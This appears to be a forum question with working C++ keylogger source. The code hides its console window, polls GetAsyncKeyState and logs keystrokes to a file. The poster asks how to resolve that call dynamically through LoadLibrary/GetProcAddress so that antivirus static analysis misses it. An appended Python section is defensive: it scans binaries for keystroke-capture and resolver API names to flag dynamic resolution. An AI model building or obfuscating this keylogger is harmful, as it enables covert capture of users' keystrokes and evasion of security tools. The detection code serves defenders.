Obfuscating Function Calls C++

  antimalware, c++, obfuscation, windows

I hope you are all doing well. I'm actually working on making my own source code obfuscator, and I noticed that a simple keylogger is detected by some antivirus engines if there is a function call like "GetAsyncKeyState" in the source code. Take as an example this source code, which is a simple keylogger main function.

```cpp
int main()
{
    ShowWindow(GetConsoleWindow(), SW_HIDE);
    char KEY = 'x';

    while (true) {
        Sleep(10);
        for (int KEY = 8; KEY <= 190; KEY++)
        {
            if (GetAsyncKeyState(KEY) == -32767) {
                if (SpecialKeys(KEY) == false) {

                    fstream LogFile;
                    LogFile.open("dat.txt", fstream::app);
                    if (LogFile.is_open()) {
                        LogFile << char(KEY);
                        LogFile.close();
                    }

                }
            }
        }
    }

    return 0;
}
```

Now I want to obfuscate the name in the "GetAsyncKeyState" function call so that no AV can detect it as a keylogger. I'm confused about how to implement the function call using ordinals and GetProcAddress, as I have tried in the code below.

```cpp
typedef int(__cdecl *MYPROC)(LPWSTR);

int main(void)
{
    HINSTANCE hinstLib;
    MYPROC ProcAdd;
    BOOL fFreeResult, fRunTimeLinkSuccess = FALSE;

    // Get a handle to the DLL module.

    hinstLib = LoadLibrary(TEXT("user32.dll"));

    // If the handle is valid, try to get the function address.

    if (hinstLib != NULL)
    {
        ProcAdd = (MYPROC)GetProcAddress(hinstLib, "GetAsyncKeyState");

        // If the function address is valid, call the function.

        if (NULL != ProcAdd)
        {
            fRunTimeLinkSuccess = TRUE;
            (ProcAdd)(L"Message sent to the DLL function\n Loaded Wao");
            printf("Yahooo Function Called");

        }
        // Free the DLL module.

        fFreeResult = FreeLibrary(hinstLib);
    }

    // If unable to call the DLL function, use an alternative.
    if (!fRunTimeLinkSuccess)
        printf("Message printed from executable\n Not Worked Soory");
    getch();
    return 0;
}
```

I don't understand this implementation. Kindly explain this as well.

I just need the equivalent of "GetAsyncKeyState(Key)" so that my obfuscator can detect that function call and replace it with the equivalent (dynamic) call, so that I can bypass static analysis detection.

Regards
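From the detection side, the following is an added example (not part of the original post or any project it mentions) of the kind of static check an analyst runs against a binary when a question like this comes up: scan the raw bytes for a watch-list of keystroke-capture APIs, in both ASCII and UTF-16LE, and flag the co-occurrence of such a name with the run-time resolver APIs (LoadLibrary and GetProcAddress) as a "dynamic resolution" indicator. The watch-lists and the byte samples are constructed for the example; a real scanner would parse the PE import table as well.

```python
import re

# Constructed watch-lists (assumption: the API names a defender cares about here).
KEYSTROKE_APIS = ("GetAsyncKeyState", "GetKeyState", "SetWindowsHookExA", "SetWindowsHookExW")
RESOLVER_APIS = ("LoadLibraryA", "LoadLibraryW", "GetProcAddress")


def find_api_names(blob: bytes, names) -> dict:
    """Return {name: [offsets]} for every watch-listed name found in blob.

    Each name is searched both as ASCII (how import-table and GetProcAddress
    strings are stored) and as UTF-16LE (how wide string literals are stored).
    """
    hits = {}
    for name in names:
        offsets = []
        for enc in ("ascii", "utf-16-le"):
            needle = name.encode(enc)
            offsets.extend(m.start() for m in re.finditer(re.escape(needle), blob))
        if offsets:
            hits[name] = sorted(offsets)
    return hits


def classify(blob: bytes) -> dict:
    """Summarise which indicators a byte blob carries.

    dynamic_resolution_suspected is set when a keystroke API name is present
    together with GetProcAddress, i.e. the name is likely passed to the resolver
    rather than appearing in the import table.
    """
    key_hits = find_api_names(blob, KEYSTROKE_APIS)
    resolver_hits = find_api_names(blob, RESOLVER_APIS)
    return {
        "keystroke_apis": sorted(key_hits),
        "resolver_apis": sorted(resolver_hits),
        "dynamic_resolution_suspected": bool(key_hits) and "GetProcAddress" in resolver_hits,
    }


# Constructed samples standing in for fragments of two binaries' data sections.
# SAMPLE_STATIC: the API appears on its own, as it would in a normal import table.
SAMPLE_STATIC = b"\x00\x00user32.dll\x00GetAsyncKeyState\x00ShowWindow\x00\x00"
# SAMPLE_DYNAMIC: the same name sits next to the resolver APIs, as in the
# LoadLibrary/GetProcAddress pattern.
SAMPLE_DYNAMIC = (
    b"\x00\x00kernel32.dll\x00LoadLibraryA\x00GetProcAddress\x00"
    b"user32.dll\x00GetAsyncKeyState\x00\x00"
)
# SAMPLE_WIDE: the name stored as a UTF-16LE wide string.
SAMPLE_WIDE = b"\x00\x00" + "GetAsyncKeyState".encode("utf-16-le") + b"\x00\x00"


if __name__ == "__main__":
    for label, blob in (("static", SAMPLE_STATIC), ("dynamic", SAMPLE_DYNAMIC), ("wide", SAMPLE_WIDE)):
        print(label, classify(blob))
```

Running the block prints one summary per constructed sample; the "dynamic" sample is the only one that raises the dynamic-resolution flag, while the "wide" sample shows that a UTF-16LE string literal is still found by the same scan.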

Source: Windows Questions
